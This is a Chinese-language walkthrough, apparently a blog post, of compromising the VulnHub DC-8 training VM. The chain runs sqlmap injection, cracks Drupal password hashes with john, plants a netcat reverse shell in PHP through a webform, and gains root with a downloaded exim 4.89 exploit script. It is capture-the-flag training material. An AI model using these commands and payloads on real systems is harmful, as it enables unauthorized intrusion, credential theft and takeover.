靶机:DC-8 DC: 8 ~ VulnHub
https://www.vulnhub.com/entry/dc-8,367/
攻击机:kail linux 2024
1,将两台虚拟机网络连接都改为NAT模式,并查看DC-8的MAC地址
2,进行主机扫描,通过MAC地址发现靶机的IP地址
得到本机IP地址:192.168.23.169;靶机IP地址:192.168.23.175
3,对靶机进行更精细的扫描
nmap -A -p- -v 192.168.23.175
发现开启了两个端口22/80
4,目录扫描,查看一下有用信息
dirsearch -u 192.168.23.175 -e * -x 403 --random-agent
5,访问一下192.168.23.175,发现一个网站
6,使用工具对网页框架结构进行扫描,看有没有可利用漏洞
web服务器为Apache,内容管理系统为drupal 7
7,由第4步扫到过一页面,访问一下知道当前是drupal 7.67,但是没有记录在案的漏洞
8,点蓝色字体的时候会转跳到Drupal的官方,而这里就只加了参数nid,非常可疑,可能存在有sql注入、xss等漏洞。在nid参数后面加‘,出现了SQL报错
9,接下来就使用sqlmap进行sql注入,爆破出数据库
sqlmap -u "http://192.168.23.175/?nid=1" --level=5 --risk=3 --batch --current-db
得到数据库名:d7db
10,爆破出表名
sqlmap -u "http://192.168.23.175/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -tables
爆出来88张表,其中users存储着用户信息
11,,接着爆破字段
sqlmap -u "http://192.168.23.175/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump
得到两个用户名和密码
admin: $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
12,建立一个文件夹存储hash密文
13,进行john爆破(john是基于字典的快速破解密码工具,是一款用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。)
语法格式:john --format=[format] --wordlist=[path to wordlist] [path to file]
得到一个密码turtle
14,测试发现是john的密码,在/user/login处登入,后续发现在WEBFORM处可以编辑并执行PHP代码
15,写一个反弹shell放入可编辑处
<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.23.169 6666");
?>
ip是kali的ip,端口为为接收反弹的一个kali未被占用的端口
16,将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保
存,联系随便填入联系表单,点击发送,触发PHP代码
提交反弹shell操作
17,在攻击机上监听端口,成功获得交互环境
18,执行python脚本获得shell交互环境
python -c 'import pty;pty.spawn("/bin/bash")'
19,查看是否存在suid提权
find / -perm -4000 -type f 2>/dev/null
1,SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险。
2,常用的SUID提权命令有:nmap、vim、find、bash、more、less、nano、cp等。
3,sudo和SUID的区别
sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上
SUID是给命令赋予root用户的权限,权限在命令上
查讯结果可以看出在使用exim4时具有root权限
20,进一步查看命令exim4命令版本(Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件)
exim4 --version
(查询结果:Exim version 4.89)
21,由此就可以在漏洞库里面寻找可利用的漏洞
searchsploit exim 4.89
找到用于本地提权的两个文件
22,阅读文本查看怎么利用漏洞
路径:/usr/share/exploitdb/exploits/linux/local/46996.sh
路径:/usr/share/exploitdb/exploits/linux/local/47307.rb
23,查看脚本文件,发现了两个使用脚本提权的方式,下载4699.6.sh脚本到攻击机
24,在攻击机上开启HTTP服务,通过网络传输文件
25,被控制的靶机通过网络下载并利用脚本,要进入/tmp目录下
wget http://192.168.23.169:8000/46996.sh
26,直接添加权限并执行没有成功
chmod 777 46996.sh
27,添加参数提权成功
./46996.sh -m netcat
28,在/root目录下找到flag.txt,DC-8渗透完毕
渗透思路:
主机发现靶机IP—端口扫描靶机服务—识别靶机网站服务—测试靶机网站注入点—发现注入点—web渗透SQL注入爆库—获取用户名密码—登入后台—发现后台可执行输入的PHP代码—反弹shell/端口监听—寻找提权漏洞—利用exim4漏洞——将提权脚本通过http协议从攻击机传输到靶机——给定权限使脚本执行——获得root权限,完成渗透
部分内容来自于网络,如有侵权联系删除
标签:提权,渗透,DC,192.168,23.175,--,靶场,权限,靶机 From: https://blog.csdn.net/zhongyuekang820/article/details/143134955